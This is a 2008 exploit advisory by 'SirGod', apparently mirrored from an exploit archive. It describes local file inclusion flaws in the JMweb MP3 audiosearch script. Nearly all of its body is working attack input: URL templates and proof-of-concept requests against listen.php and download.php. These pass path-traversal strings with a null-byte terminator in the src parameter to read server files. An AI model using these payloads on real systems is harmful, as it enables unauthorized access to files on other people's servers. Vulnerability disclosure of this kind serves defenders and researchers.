[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : JMweb Multiple (src) Local File Inclusion Vulnerabilities
# Published : 2008-10-04
# Author : SirGod
# Previous Title : pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
# Next Title : FOSS Gallery Admin <= 1.0 Remote Arbitrary Upload Exploit


#################################################################################################
[+] JMweb MP3 (src) Multiple Local File Inclusion
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex
##################################################################################################

# Script Homepage:
# http://www.jesse-web.co.cc //

[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip

[+] Local File Inclusion

     Example  1 :

       http://[target]/[path]/listen.php?src=[Local File]%00

     PoC 1 :

       http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00


    Example 2 :

       http://[target]/[path]/download.php?src=[Local File]%00

    PoC 2 :

      http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00

##################################################################################################

# www.Syue.com [2008-10-04]